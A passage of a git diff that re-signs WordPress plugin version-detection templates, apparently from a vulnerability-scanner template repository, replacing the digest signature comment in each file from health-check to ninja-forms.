a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100f9c0091947b22dbb216ad4cb86c8bc5d8fe89a47224488cac760482355189ed10221008c43ed52a88e89d9468fb4b9fc9d2d39daa12eeadb791f49954acf040e7f9272:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200b9bfe4c1c54840627f8010bcc5aba3adac3bd5aa57686bc5908ad9fb46f6479022100a45a4be89a54eb97fa70ad6c328ff1e15cba459d7eb510036973adf5e0cf16fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index f4d9f2d870..e591bf7965 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100d4cb4b79dcbd39c44a0c2d859e5c455d26eb8e6028784c6ab6938ce747c6df50022100981902b11c7dc0605a0579f822f7352d628348a94d3b0db14ce1ec97988ae197:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100affc4199c981eff0633916167aacd5024a844219c1c35ecf596bac7c5e111b8e02207d7da3718c7ac7d5b1f498d78f972083d82a4f45d8de6e2b198ad765899ff3e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index db300ee39f..e6acb040cb 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221008b5fa6f5bc8f474e8dbf7ac5fb880d80db6e899b6af696922f138037b2d4073f0221008165d6a1669bc66a72525e7b8fab102d4bd5d2e0436da938a6adb350277ff090:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220621f8559b2b3a5fed1abb7d88ffd048aed2892a1e010eeab129e6f787b92bf8c022100b8b602caa5ad7e45e2b6ec2df156f68e54e13066658b9170763eacf283d74c2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index e7265119c4..bd74f7fb02 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100d1dbde1a11fa08bd4e791bc69b8721891cda4bb6491db8f8a3d0322c607bdf1402202d0066b860acfd2b47d86040b5b9a30d721cb4d3e6dc1b97b095ac42dec0e044:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201f9e1afdd31d8b2f8365f625fd9162e4b072b7492ea49dc7ff135733ec1ddbc30221008526ae5729fd3b8f63683724980c8299a176416e5e9b5412501525fc44811cf2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index e8065e572c..7c201f8af2 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022055f780206e2b82423ed5c3a99a1d626599d7deef7a66aa9f980f6e47361e85cd02202b33d201a7aaf3a1d846fdfe786fa94815017c112cc205e5e0e8c30a6c4d6e86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f0fc511120ce845f71d28175a7620a55f2e7915f534464101288b6d8c4b9d96e022100e3369265cd00dbe504049cd502795905720c129622a8db97e9abf7049997e5fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 35ddd7c2af..c0a65cfeef 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022071bbe81a3860491b906978fbc08c36e3eef950bcce3d444da7056f1b959d74aa022100904ffc88c9f3163c6b56ea2b906c93b85792f0159678cdbb56197ad51f44ab2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206e261c6a1900698b5a4ba577920967104daeacecc442cc87074c94692ce79392022100d56908c9a3d54b992089c9ac040fd549dec74f12c895e4be40ff9888b94eecc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 38895faf15..115e49554b 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100ae545a5c879d30e2d00e333cc2f27c184adb812d3bf96ba2bd2166a1c84b2f99022064e2ea988420c2d4e61fb754ffe8871fdc2b75f09e757f43c9c488066a78d271:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ff259a780e1cb16c6067d0155af392a5e586d6987249ed51f5a30fe1b4bb59b80220193b4146c0fb0b43e1be8e3a2d752aca24037b7e45b69a23910c38276f654583:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 272c0d2556..836171663c 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022010bf0d4929d48c9a462c2f74d8c923e3f10c3e1fe83e8ac55a035b9edeeafffb02205f66007582ff4107db7901b96ed7a8449e074e80a9da80f6a721f4df6482225d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207a2e5465ffa22a699ea013394d9e9cbec8b0d3ad4e33f7e31a642693d0fe5ce902205aa7a0cf52d32b445dc8cbb0de8c9305d992369a27f096f6255988a1078616bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index f30a733f5b..295ffc4843 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502204ed8469a5d6bec57b34e11c3ccb34eafc9a5393c8048f75b968fb9159a6216f502210099d5394fc8da29592c0959faf74f19b4b1320596d37eac7c61afd567041ea803:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203d47777c61d375ce5ffd551f8e7047bf00b246b8f245fb3a7205e08c30bf1c99022007007c81aacdc12e8a49ac630be8c7ee44107d1d626aa96f64ac72a9873a3055:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index b7832aa92b..3a08625c1d 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402201965e1b179218c41a3283afa3f5dcd321e5e183c08fb60c1a52c0dbce031697c02207bd5d691d863246356cac1cef0468b58ab90908f3c992df9f76589114d62b1f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204e5e472f157cc5b6caec1b57a29db684d99041e5b9a5ccdf9172b2173db0bd6e022051eb9f2c268110f88d1056bdf9c94a7d1483fc5fd1d026e4bd82a96d233711ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 105aa93b65..7e28aaf687 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502206ff32ebbacd9b38de0a0cc443e67ad3fe1e52b5b56361c3202711d127682344f022100b87230487c602b2c4c26a24cf7e673274803b5652667d7bf056f31f82c1e866b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202cfebac6c5e73582eb533d6de84d27e87bd6bb1930920cbd32c2669e84d34c4b022100b5d7abbac0905a050c011f39f8a8752f5d1bf68e8a1575f881c7600bc549b0c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 7a313d7bf6..c455e06811 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220304faee56d62f11ca1adf195eca524b79f957e47cf05bad567e85ade12877c500220749fcb21e33762ff4c0ea61c099946276a2addcc3d8877344bf5403ede1d3239:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008f02bdfec85457e3795510fa01f5a2b768935dc00f5ee60d22f8a38c4af2661c022100c76e9586f54133f068f2b894cc2ed5e6bacc545336eb6aad7393f78d85f43bc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 2fabd0657a..f2214c6c2a 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022032340b4af5b7a668c3dcd4d31dc6a074e4b515858c006e641ec980e9492d80e6022021f6472d407c54bac9183a60440df0a4e57c24c12069298ad18de1d45f0e6263:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dec013cea3852538a0c33652ba41b802d11b5b32defb543ab3031bd573f63111022100ef28650657ebcb693bf688ae262ee0f708f26f215a881c87247c50b39d8dbe13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 0c8bdc23fa..200aab01e5 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100a2ed70d28e7bda6aa86d16af9129b0096ccfe827c3893b5eca23d07ed387ad41022100c363ca7159d7fc2ff72ed1c4e4574c4cb0954b2a6991f22e2019d6d5233ca580:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100819aad3dc5d5608b053fcc0dc69722db147f2f0cb5a6f05c73abdfacb811efae022011633b6aae4e42545adf73cc3def1c4eaa078ba0f6694d2bb82cb21850645a68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 5534c2dcc4..58d9ffd9a4 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100b26fe11c93b5c059eb7157a83187b23596bd0fadb9f3a0ac1bd2f9eba95494a6022100e7edcb718462f1d33ec3ce885e76ee4348699620fc42d0f80fd81ff863d87bf5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022072ddf26864fda679473388a75665fd837f93ad549e484dd0bf9796dcd0e32dc002210081424f2b28a67629d4beaa0138e84f84853740a0e354c4f21d3e95c58e7ee98a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index a2e0e41bc7..e4187f85f7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100a336ca6a537ae59d352d5dfef838e7059768fe2cbc7ad8fe1e9ba46508aa414b022100fe33b5c00c59cf3fe881217b2540fcc47be826bcdce4357c2154f3ffda87e40d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022049b3ed24d83bf46352650f5881359af66093657ac1c10184f61ef20a6776771e02210081aaee5e862cf42c35c94d74ca4846a14c8368ec19b3e2bc43d8824e765e0a92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 9f02949773..eab57fe3a8 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100c9d3d7ebb7797272f42ac18227c2f707cf17f0dad6cfa9e9dfb892f1efcf282e022100a33bafd155d98b05a417a1e38149df6e0dce184e674adca1264c64bcc11d1f1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ad481bcc423c0af2c347b57fb81aaf9df6488c2a1d0f4e3f8ea632942b60af7e0220149178882b37b42251ca70ec2284af15bcca83c5af683d91268d9c377da5a12d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index a45ac54987..e8c3102405 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402200c0516786b653972a1cb3d71e4cab5c46b8d1d195fd9439aa58d956b8ff4dfd7022049a820be4bb75bec4b4f5595208fa2cae952bb13591a38745aa9ae78d1e5a5ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200240362072e05b2016339d9b8bc206b1f5eda1641fb8fe922eded59a284c1f23022100c66ebad1abf4b88d05a87c2d46dec7b5fb4362729257fbc024eb9a5cc1ca502f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 437cdd55d6..fdd5f7ae44 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402203812292a685a3c8f68e17c2e6f1189b4af191cda63b85cf5ff6151c1a1a61a310220291cb8a458ec66bb2235f8db67ffde166f7afa2c1328340436770351be4bdb3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a3d300c931b49a37af842a40ed87e0bf845f946c0136dccbdc61dadf0cc0ec2f02206522d4dbef1314cae973b0e7b1db18b42039d882ae3a1c799502b78b18a32031:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 598f28228e..0c93cc672a 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022077b784a30e24f3d13b63de72431398bf73a4e748d8a1b6414c0c83ae844ae13f022034b56a785fa47552c6caaabc2662d000f2a23623094e207eb781731bbf0d30e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e35f812788aac2f631c95accf584abc5df5b2f3be830f4e57b1c2d2d23410d3d022100adf148d1b7175da2df74531790a7110927112efe42cfec626dc96bf8458e7f60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index b00d1e2ff9..58dec0ad19 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402206c4848b67e595891348a07b2b3447e5786958ffd88abbd5517d5e854ddbeb27002206eb4d1d7d48a892089d5b8173607be5f1c9be701cd462f2216ce3d75d726fcdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202fb4a37f8d82570a3115b12557147828d6c4731c18e10fe6736257f45e38052a022027515efd36cc633a4f593e5f862aaea552c3593d889f021abf81cd842a35365b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 7fd1a63a06..88751eaa57 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502201c34add51e2268dd4899f7ee6507f2584e3d7c80672c2d2afd7bd50daf908a41022100d0ce5954b1b40ba7864867c848b23ee92ace0a0f74d1a16833655b08acc1ef1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dcac5f8a3fbd849c1d8483eaad9206d39bf878f4b3eb99e0c391147db7392015022075cc2ca88601a960b68d07098358b1c0f6eeaa87cb3037d8e1682ae221f4e192:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 9c4970390b..766695a1da 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100839eeae6dbf1baa7beb95ef721c87c3ddfdd333978191d0ab30563ca05a8d78302200defbaa59dd907d9ab1a6a3c5045ea7179c7d499a49c5ddc8500031c9879fc23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100965370c36ec0ef8311e2677e03d958e798de2c6f85c4d2c2084efa66965f1998022100d751a03e2406ca9adf5f25d969ae28775df2866dfc5b65f1c59812d21483f437:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index ee8e9f507f..c47fc3da1c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100e4f61fa4e93dd2490bdfddda20256c1c027e16eac9d5d5b5164571aec9c68c65022006c1825f6950add564a7b1e65d5dc3e89d64b0ede3645038f227d074f9236e7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100981356f1188a16fe79fe630c260b7cb95a46842f6cdbf582c8471bf730bcc6fa02210096f18e7bbaee241a52d172fff08316296775ab7084e52413d0276d0f0f427b81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 2ab4a841fd..1c151414ab 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502201ecaa23adc4f2050bff01a4d6e62ab7d5d32812c0b6cec8043c36846ea1c6b07022100b6cdf4f8e8981d7c6bef8cfd557337fbfe8426fbe93ec3e9d874c1d795a7832d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210088117751a434cbf4e31bbc1c4d1131f073ff6b3880c594d655fa5bce1cc468a4022100ab9638f979d4d6947395aba430993d6db795098c1d92353108de2805bdc1cbda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index dc763c9569..f343e4706c 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100b16fb19020e20d434826ebf98b36d699bd9d2b09bf06764dbf60f991248c00a402202e6709f24b56f89e8a20bfeb8babd46e1fd54c4ef6045d49d4c13b57c18bde59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b205790a84c48006e728b10301d0a775f6b6cdbe059bb023d21bf7f3bdd3709302207f458cc6d6eb4aecb575b020ed9fd22bda6099f84974822cb437511265938b1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 27e70822e7..2c0c7460f9 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022013097b8dd40ab884c1c55535188b5cd1a8ae4f4e4a65ce17397394b17e94cb2f02207b2197f09f32fa31c79ef51b3344260e801ef49b167cbed255774682321a3f13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eb4bf8b4e40bf8be4ffc1bd71b6448522b8b448435b2c444f0c127ac4af020d50220299ad2110a42400e3877646b320b41ffc3ecade946ac1920394a8029f66b9919:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 6ff8a07e79..18e156e84e 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022018894e4016048ea2f7b0588ffb157eed9b27723f37a160ce989186302a19322d022029495a00ebefb972fb2f2395207cf70fda9d4a505ec858e8f2139660009518ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ed3bcd868fd5d4b4fb1c2014d62946e12b46d818ecfcea273c2f206c43e815b7022100cd220859fa264de796801658b0cf374d1ec887fc4e38ebacb721f2f76c98ee4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index 39cac8d775..28820cb99e 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100b5e6d8605481757256181e250d3bb1dcf69e296554171a55e21903fa2649a6a4022100bb05a96b127c53c7fd0ff147b0dbd26dfdbb34b10c5cd6eaa593c116bb31b11e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220537b1786ed0d2cb4c8cb1fdefc3b9d418c29853be080196e6f9d864e5b374cf002204553f3d67f3d7926db9acbcd3a4412709a679894c19edb16e10f7bd204427104:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 955a11a8b5..62be950d7c 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100e0fa77495d325081e6ab9d5fa6d3f776f68e950149cc45d5ccc62ceb35ae491102206c62237c7dd27a631d4787be73074909de0885d45379ccf2067ffd7fc47d34e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fa2a55a1ff0681eb58f3aa37a87d920aeb6f8228098823282a1bfe403ea684e6022100fe6e4181298e26dde39b23ef159c077eec979b060d0738f50276379f77908b27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index c3242f0c7d..6b09a15983 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100c3068dfe7152d1ebe0a31c3ef72c615471353cec7da93f6b8726aac015d1cbae02210089b38b1ef1995f5739c83183e1d4c591c85b304aa24dcc83b4a950fdbe22392d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210092bccdd677e133559f02ff7bc0f4aea1973e1eeba2af84104f50006e43f731f1022100d1e5809dd128afb88e5afd39a00f5439e972f6d585674baaa747d71507d623f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index f45f9d3fb2..bd1ceeb308 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221008f113c3d3c4cd6b8714fe2bb5093ab52f5271fc96d4e890f57775406cc5e6136022100c8327b90b3dd0861f91bad78edbe041ddf20da3b3adffa48c086e41bb7ebb623:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220575aa0533e682d014433035891732e12eb2ea422914aef3342732d15e65e783e022024da7c10175620bb4e7cc1cd6bb66894e2253a5e31506ccc1ad8a33d2557eab4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 13083d4634..427cff6ec8 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502206ad90e5e96912a018bfe40ac827c9f3b891bf0092b0eafa9c526c8d90ccb5638022100828cf174073a648130314940d19ec39baf080076b7cf64d6f3de3d4d087f51da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ed837934f54574856db7521c594d77c1ee7224316634380738cb54beda6a4e58022021ee583ed15012a8484ca9e427a17f566c6d5e2236861d826a77d35033710057:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index bdbf1c8a6e..fcbbe7d4a5 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220204c9734e9c758213e83738059a6f618faeb9602cb70dd23d6d63b8f6d7bbed5022100e379f9d0816f4455576dd88875992bf15ceafefd516abe9b62c4495a8d8ce3a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205c43690f018cd53a8730ac57e01e8c9899de339184865ffc28115c181ff5d00b0220227d15f1dda45120183fce2143bb3eb914b99c93abf30f34d91ffc0995c21b09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 